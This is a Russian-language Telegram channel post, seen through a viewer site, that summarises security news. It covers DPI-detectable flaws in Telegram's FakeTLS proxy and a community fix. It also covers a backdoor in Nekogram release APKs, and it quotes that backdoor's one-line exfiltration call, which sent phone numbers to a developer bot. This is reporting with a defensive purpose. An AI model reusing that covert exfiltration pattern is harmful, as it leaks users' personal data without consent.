TGViewer
LinuxSkill - Сводки с прода и Шпаргалки LinuxSkill - Сводки с прода и Шпаргалки @linuxskill · 10.7K subscribers
Post #1137 5.1K
🚨 Как сторонние Telegram-клиенты сливают данные и кто на самом деле обошел блокировки

Думаешь, официальный Telegram своими силами борется с блокировками, а сторонние open-source клиенты абсолютно прозрачны? Оказалось, мессенджер выезжает за счет комьюнити, а популярные форки содержат полноценный spyware. Собрал для тебя техническую хронологию грандиозного провала ИБ в экосистеме Telegram.

Хроника расследования на Хабре и OpenNet:

1. «Telegram обошёл блокировку РКН» — нет, не Telegram / Хабр > https://habr.com/ru/articles/1019200/

Официальная команда Telegram три месяца игнорировала блокировки ТСПУ. Встроенный FakeTLS (MTProxy) генерировал математически кривые пакеты:

Ошибка 1: Аномальный размер ключа
По спецификации X25519-ключ обязан занимать ровно 32 байта (256 бит). Код Telegram генерировал 20 байт. Для DPI это тривиальный маркер блокировки.

Ошибка 2: Использование драфтового мусора
Вместо стандартного идентификатора 0xFE0D для Encrypted Client Hello (ECH), Telegram слал несуществующий 0xFE02, которого нет ни в одном реальном браузере.

Комьюнити Telemt отреверсило фильтры и принесло готовый Pull Request (#30513).

Энтузиасты сами нашли сигнатуры и собрали патч. Мейнтейнер tdesktop смерджил минимальный набор исправлений, а Павел Дуров отчитался о «цифровом сопротивлении», ни разу не упомянув реальных авторов фикса. При этом фундаментальная проблема L7-анализа осталась нерешенной.

2. Неофициальный Telegram-клиент Nekogram отправлял номера телефонов боту разработчика > https://www.opennet.ru/opennews/art.shtml?num=65130

Исходный код Nekogram на GitHub был чистым, но в релизные APK-пакеты (в Google Play и Telegram-каналах) вшивался вредоносный обфусцированный код.

В классе Extra.java находился бэкдор, перебирающий до 8 аккаунтов пользователя. Он формировал JSON-карту связок UserID и номеров телефонов:
{"123456789": "+79001234567"}

Данные скрытно сливались через инлайн-запрос, не оставляя следов в истории чатов:
InlineBotHelper.Query("@nekonotificationbot", payload);

Те, кто ставил альтернативный клиент ради расширенных функций, отдавали свои номера разработчику, который мог продавать их создателям OSINT-ботов (в коде были упоминания @tgdb_search_bot и @usinfobot). Вдобавок, ZDI раскрыли RCE-уязвимость (ZDI-CAN-30207) в официальной телеге: выполнение кода было возможно через библиотеку rlottie при предпросмотре анимированных стикеров (уязвимость снизили с 9.8 до 7.0 после того, как ТГ заявил о серверных проверках).



❗️❗️❗️ Нравится формат? Ставь 👍

👉 Рубрика: #News@LinuxSkill

#telegram #infosec #nekogram #privacy
  • 👍 25
  • 🔥 3
  • 👎 1
More from @linuxskill
  1. Oct 7, 2026Post #1243
  2. Oct 6, 2026GitOps-практики: развёртываем сервис через ArgoCD Классический CI/CD запускает деплой. Но…
  3. Oct 5, 2026Post #1241
  4. Oct 2, 2026📊 Диск тормозит, а iostat показывает норму? Ищем хвост задержек Приложение подвисает на з…
  5. Sep 30, 2026💀 CPU под 100%, а в top пусто? Ловим невидимые процессы через eBPF Сервер греется, в шапк…
  6. Sep 28, 2026🔥 Знаешь только ip a? 10 неочевидных команд ip для Linux Большинство админов знают про ip…
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →